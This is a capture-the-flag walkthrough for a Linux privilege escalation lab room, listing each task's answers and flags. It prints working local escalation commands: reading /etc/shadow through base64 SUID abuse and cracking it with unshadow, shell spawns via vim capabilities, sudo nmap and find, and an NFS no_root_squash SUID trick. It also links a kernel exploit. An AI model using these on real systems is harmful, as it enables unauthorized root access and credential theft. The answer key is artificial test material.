In this walk through, we will be going through the Linux Privilege Escalation from Tryhackme. This room is rated as Medium on the platform and teaches fundamentals of Linux Privilege Escalation from enumeration to exploitation covering 8 different privilege escalation techniques. So, let’s get started without any delay.
Table of Contents
Task 1 – Introduction
Task 2 – What is Privilege Escalation?
What does “Linux privilege escalation” mean?
At it’s core, Privilege Escalation usually involves going from a lower permission account to a higher permission one. More technically, it’s the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users.
Task 3 – Enumeration
Question 1 – What is the hostname of the target system?
hostname
wade7363
Question 2 – What is the Linux kernel version of the target system?
uname -r
3.13.0-24-generic
Question 3 – What Linux is this?
cat /etc/issue
Ubuntu 14.04 LTS
Question 4 – What version of the Python language is installed on the system?
python
2.7.6
Question 5 – What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
CVE-2015-1328
Task 4 – Automated Enumeration Tools
Task 5 – Privilege Escalation: Kernel Exploits
Question 1 – find and use the appropriate kernel exploit to gain root privileges on the target system.
Done
Link: https://www.exploit-db.com/exploits/37292
Question 2 – What is the content of the flag1.txt file?
THM-28392872729920
Task 6 – Privilege Escalation: Sudo
Question 1 – How many programs can the user “karen” run on the target system with sudo rights?
sudo -l
3
Question 2 – What is the content of the flag2.txt file?
THM-402028394
Question 3 – How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
sudo nmap --interactive
Question 4 – What is the hash of frank’s password?
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:
Task 7 – Privilege Escalation: SUID
Question 1 – Which user shares the name of a great comic book writer?
cat /etc/passwd
gerryconway
Question 2 – What is the password of user2?
LFILE=/etc/shadow base64 "$LFILE" | base64 --decode
unshadow passwd.txt shadow.txt > finalpasswords.txt
Password1
Question 3 – What is the content of the flag3.txt file?
LFILE=/home/ubuntu/flag3.txt base64 "$LFILE" | base64 --decode
THM-3847834
Task 8 – Privilege Escalation: Capabilities
Question 1 – Complete the task described above on the target system
Done
Question 2 – How many binaries have set capabilities?
6
Question 3 – What other binary can be used through its capabilities?
view
Question 4 – What is the content of the flag4.txt file?
./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
THM-9349843
Task 9 – Privilege Escalation: Cron Jobs
Question 1 – How many user-defined cron jobs can you see on the target system?
4
Question 2 – What is the content of the flag5.txt file?
THM-383000283
Question 3 – What is Matt’s password?
123456
Task 10 – Privilege Escalation: PATH
Question 1 – What is the odd folder you have write access for?
find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3| sort -u find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u home/murdoch
/home/murdoch
Question 2 – Exploit the $PATH vulnerability to read the content of the flag6.txt file.
Done
Question 3 – What is the content of the flag6.txt file?
THM-736628929
Task 11 – Privilege Escalation: NFS
Question 1 – How many mountable shares can you identify on the target system?
3
Question 2 – How many shares have the “no_root_squash” option enabled?
3
Question 3 – Gain a root shell on the target system
Done
showmount -e 10.10.223.142
mkdir /tmp/rootshell
sudo mount -o rw 10.10.223.142:/home/backup /tmp/rootshell
gcc nfs.c -o nfs -w chmod +s nfs ls -l nfs
Question 4 – What is the content of the flag7.txt file?
THM-89384012
Task 12 – Capstone Challenge
You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.
Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.
You can access the target machine over your browser or use the SSH credentials below.
- Username: leonard
- Password: Penny123
Priv Esc techniques used:
- SUID
- Sudo
find / -type f -perm -04000 -ls 2>/dev/null LFILE=/etc/shadow base64 "$LFILE" | base64 --decode
find . -exec /bin/sh \; -quit
Question 1 – What is the content of the flag1.txt file?
THM-42828719920544
Question 2 – What is the content of the flag2.txt file?
THM-168824782390238
Also Read: Tryhackme – Linux PrivEsc
So that was “Linux Privilege Escalation” for you. In this room, we covered a variety of Linux privilege escalation techniques which we can use once we landed in a linux machine. Well, the best thing on any machine is to be root and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.